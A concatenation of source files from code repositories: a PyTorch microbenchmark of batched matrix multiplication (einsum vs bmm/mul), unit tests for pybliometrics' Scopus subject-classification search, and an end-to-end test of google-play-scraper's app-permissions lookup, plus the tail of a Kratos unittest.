self.assertEqual(args[1], '/ModelData/model_part/1.23')
if __name__ == "__main__":
KratosUnittest.main()
|
benchmarks/operator_benchmark/pt/matrix_mult_test.py | Hacky-DH/pytorch | 60,067 | 11156858 | import operator_benchmark as op_bench
import torch
"""
Microbenchmarks for batch matrix mult with einsum and torch.bmm.
"""
batch_mm_configs_short = op_bench.config_list(
attr_names=["B", "M", "N", "K"],
attrs=[
[4, 5, 3, 2],
[32, 25, 20, 30],
[128, 100, 120, 110],
],
cross_product_configs={
'device': ['cpu', 'cuda'],
},
tags=["short"],
)
batch_mm_configs_long = op_bench.config_list(
attr_names=["B", "M", "N", "K"],
attrs=[
[128, 256, 128, 256],
[512, 1024, 1024, 512],
],
cross_product_configs={
'device': ['cpu', 'cuda'],
},
tags=["long"],
)
batch_mm_op_list = op_bench.op_list(
attr_names=['op_name', 'op_func'],
attrs=[
['einsum_bmm', torch.einsum],
['bmm', torch.bmm],
],
)
class BatchMatrixMultBenchmark(op_bench.TorchBenchmarkBase):
def init(self, B, M, N, K, device, op_func):
self.inputs = {
"input_one": torch.rand(B, M, N, device=device),
"input_two": torch.rand(B, N, K, device=device)
}
self.op_func = op_func
def forward(self, input_one, input_two):
if self.op_func.__name__ == "einsum":
return torch.einsum('bij,bjk->bik', input_one, input_two)
else:
return torch.bmm(input_one, input_two)
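# Sanity check (editor addition): for these shapes the two code paths agree up
# to floating-point tolerance, e.g.
#   a, b = torch.rand(4, 5, 3), torch.rand(4, 3, 2)
#   assert torch.allclose(torch.einsum('bij,bjk->bik', a, b), torch.bmm(a, b))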
"""
Microbenchmarks for element-wise matrix mult with einsum and torch.mul.
"""
batch_elementwise_configs_short = op_bench.config_list(
attr_names=["B", "M", "N"],
attrs=[
[4, 5, 3],
[32, 25, 20],
[100, 90, 110],
],
cross_product_configs={
'device': ['cpu', 'cuda'],
},
tags=["short"],
)
batch_elementwise_configs_long = op_bench.cross_product_configs(
B=[128, 512, 1024],
M=[128, 512, 1024],
N=[128, 512, 1024],
device=['cpu', 'cuda'],
tags=['long']
)
batch_elementwise_op_list = op_bench.op_list(
attr_names=['op_name', 'op_func'],
attrs=[
['einsum_elementwise', torch.einsum],
['mul', torch.mul],
],
)
class BatchElementWiseBenchmark(op_bench.TorchBenchmarkBase):
def init(self, B, M, N, device, op_func):
self.inputs = {
"input_one": torch.rand(B, M, N, device=device),
"input_two": torch.rand(B, M, N, device=device)
}
self.op_func = op_func
def forward(self, input_one, input_two):
if self.op_func.__name__ == "einsum":
return torch.einsum('bij,bij->bij', input_one, input_two)
else:
return torch.mul(input_one, input_two)
op_bench.generate_pt_tests_from_op_list(
batch_mm_op_list,
batch_mm_configs_short + batch_mm_configs_long,
BatchMatrixMultBenchmark,
)
op_bench.generate_pt_tests_from_op_list(
batch_elementwise_op_list,
batch_elementwise_configs_short + batch_elementwise_configs_long,
BatchElementWiseBenchmark,
)
if __name__ == "__main__":
op_bench.benchmark_runner.main()
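# Typical invocation (editor addition; the module path and flag name follow the
# standard operator_benchmark runner and are an assumption here):
#   python -m pt.matrix_mult_test --tag_filter short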
|
pybliometrics/scopus/tests/test_SubjectClassifications.py | herreio/pybliometrics | 186 | 11156866 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for `scopus.SubjectClassifications` module."""
from nose.tools import assert_equal, assert_true
from pybliometrics.scopus import SubjectClassifications
# Search by words in subject description
sub1 = SubjectClassifications({'description': 'Physics'}, refresh=30)
# Search by subject code
sub2 = SubjectClassifications({'code': '2613'}, refresh=30)
# Search by words in subject detail
sub3 = SubjectClassifications({'detail': 'Processes'}, refresh=30)
# Search by subject abbreviation
sub4 = SubjectClassifications({'abbrev': 'MATH'}, refresh=30)
# Search by multiple criteria
sub5 = SubjectClassifications({'description': 'Engineering', 'detail': 'Fluid'}, refresh=30)
# Search by multiple criteria, subset returned fields
sub6 = SubjectClassifications({'detail': 'Analysis', 'description': 'Mathematics'},
fields=['description', 'detail'], refresh=30)
def test_results_desc():
assert_true(len(sub1.results) > 0)
assert_true(all(['Physics' in res.description for res in sub1.results]))
def test_results_code():
assert_equal(len(sub2.results), 1)
assert_equal(sub2.results[0].code, '2613')
def test_results_detail():
assert_true(len(sub3.results) > 0)
assert_true(all(['Processes' in res.detail for res in sub3.results]))
def test_results_abbrev():
assert_true(len(sub4.results) > 0)
assert_true(all(['MATH' in res.abbrev for res in sub4.results]))
def test_results_multi():
assert_true(len(sub5.results) > 0)
assert_true(all(['Engineering' in res.description for res in sub5.results]))
assert_true(all(['Fluid' in res.detail for res in sub5.results]))
def test_results_fields():
assert_true(len(sub6.results) > 0)
assert_true(all(['Mathematics' in res.description for res in sub6.results]))
assert_true(all(['Analysis' in res.detail for res in sub6.results]))
assert_true(all([set(res._fields) == set(['description', 'detail']) for res in sub6.results]))
|
tests/e2e_tests/test_permissions.py | shikher-chhawchharia/google-play-scraper | 325 | 11156872 | from unittest import TestCase
from google_play_scraper.features.permissions import permissions
class TestPermission(TestCase):
def test_reply_data_all_types(self):
result = permissions("com.spotify.music", lang="en", country="us")
self.assertDictEqual(
{
"Device ID & call information": ["read phone status and identity"],
"Identity": ["add or remove accounts", "find accounts on the device"],
"Storage": [
"modify or delete the contents of your USB storage",
"read the contents of your USB storage",
],
"Phone": ["read phone status and identity"],
"Microphone": ["record audio"],
"Wi-Fi connection information": ["view Wi-Fi connections"],
"Contacts": ["find accounts on the device"],
"Camera": ["take pictures and videos"],
"Photos/Media/Files": [
"modify or delete the contents of your USB storage",
"read the contents of your USB storage",
],
"Other": [
"access Bluetooth settings",
"allow Wi-Fi Multicast reception",
"change network connectivity",
"change your audio settings",
"control Near Field Communication",
"control vibration",
"full network access",
"install shortcuts",
"pair with Bluetooth devices",
"prevent device from sleeping",
"run at startup",
"send sticky broadcast",
"use accounts on the device",
"view network connections",
],
"Uncategorized": ["receive data from Internet"],
},
result,
)
def test_reply_data_only_other_type(self):
result = permissions("example.matharithmetics", lang="en", country="us")
self.assertDictEqual(
{
"Wi-Fi connection information": ["view Wi-Fi connections"],
"Photos/Media/Files": [
"modify or delete the contents of your USB storage",
"read the contents of your USB storage",
],
"Storage": [
"modify or delete the contents of your USB storage",
"read the contents of your USB storage",
],
"Other": [
"control vibration",
"full network access",
"run at startup",
"view network connections",
],
},
result,
)
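# Direct usage outside the test runner (editor addition; requires network
# access):
#   perms = permissions("com.spotify.music", lang="en", country="us")
#   print(sorted(perms))  # permission groups, e.g. "Camera", "Contacts", ...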
|